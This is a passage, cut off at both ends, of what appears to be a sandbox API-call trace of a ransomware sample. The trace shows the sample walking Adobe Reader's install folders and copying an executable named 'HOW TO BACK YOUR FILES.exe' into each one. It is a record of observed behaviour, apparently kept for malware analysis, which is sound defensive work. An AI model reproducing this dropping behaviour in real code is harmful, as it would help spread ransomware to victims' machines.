lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x832ee480, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x7200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WebLink.CAT", cAlternateFileName="")) returned 0 [0061.119] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0061.119] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2368 [0061.119] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Services" [0061.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0061.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0061.119] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Services") returned 69 [0061.119] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Services" [0061.119] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.120] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.125] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.125] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f24da0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55effe80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55effe80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.125] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.125] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.126] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal" [0061.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0061.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0061.126] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal") returned 53 [0061.126] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal" [0061.126] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.126] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.131] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.131] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a50d20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55effe80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55effe80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.131] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.131] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.131] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR" [0061.131] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c2588 | out: hHeap=0x2b0000) returned 1 [0061.132] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2660 | out: hHeap=0x2b0000) returned 1 [0061.132] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR") returned 57 [0061.132] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR" [0061.132] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.132] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ukr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.135] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.135] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a50d20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55f25fe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55f25fe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.135] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.135] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.135] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR" [0061.135] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c2508 | out: hHeap=0x2b0000) returned 1 [0061.135] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2640 | out: hHeap=0x2b0000) returned 1 [0061.135] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR") returned 57 [0061.136] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR" [0061.136] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.136] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\tur\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.139] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.139] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a50d20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55f25fe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55f25fe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.140] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.140] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.140] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE" [0061.140] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c2488 | out: hHeap=0x2b0000) returned 1 [0061.140] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0061.140] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE") returned 57 [0061.140] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE" [0061.140] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.140] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sve\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.144] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.144] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81d81e80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55f25fe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55f25fe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.144] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.144] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.144] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO" [0061.144] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c2408 | out: hHeap=0x2b0000) returned 1 [0061.144] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2620 | out: hHeap=0x2b0000) returned 1 [0061.144] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO") returned 57 [0061.144] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO" [0061.144] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.144] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\suo\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.148] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.148] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81dce140, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55f25fe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55f25fe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.148] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.148] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.148] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SLV", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SLV") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SLV" [0061.149] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c2388 | out: hHeap=0x2b0000) returned 1 [0061.149] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2600 | out: hHeap=0x2b0000) returned 1 [0061.149] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SLV") returned 57 [0061.149] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SLV" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SLV") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SLV" [0061.149] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.149] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SLV\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\slv\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.155] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.155] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SLV\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a50d20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55f4c140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55f4c140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.155] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.155] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.155] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SKY", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SKY") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SKY" [0061.155] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c2308 | out: hHeap=0x2b0000) returned 1 [0061.155] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25e0 | out: hHeap=0x2b0000) returned 1 [0061.155] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SKY") returned 57 [0061.155] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SKY" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SKY") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SKY" [0061.155] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.155] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SKY\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sky\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.160] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.160] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SKY\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a50d20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55f4c140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55f4c140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.160] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.160] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.161] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUS", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUS") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUS" [0061.161] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c2288 | out: hHeap=0x2b0000) returned 1 [0061.161] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25c0 | out: hHeap=0x2b0000) returned 1 [0061.161] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUS") returned 57 [0061.161] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUS" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUS") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUS" [0061.161] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.161] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\rus\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.164] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.164] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a50d20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55f4c140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55f4c140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.164] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.164] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.164] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM" [0061.165] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c2208 | out: hHeap=0x2b0000) returned 1 [0061.165] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25a0 | out: hHeap=0x2b0000) returned 1 [0061.165] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM") returned 57 [0061.165] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM" [0061.165] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.165] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\rum\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.170] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.170] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a76e80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55f722a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55f722a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.170] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.170] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.170] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\PTB", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\PTB") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\PTB" [0061.170] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c2188 | out: hHeap=0x2b0000) returned 1 [0061.170] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2580 | out: hHeap=0x2b0000) returned 1 [0061.170] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\PTB") returned 57 [0061.170] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\PTB" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\PTB") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\PTB" [0061.170] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.170] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\PTB\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ptb\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.173] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.173] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\PTB\\*", 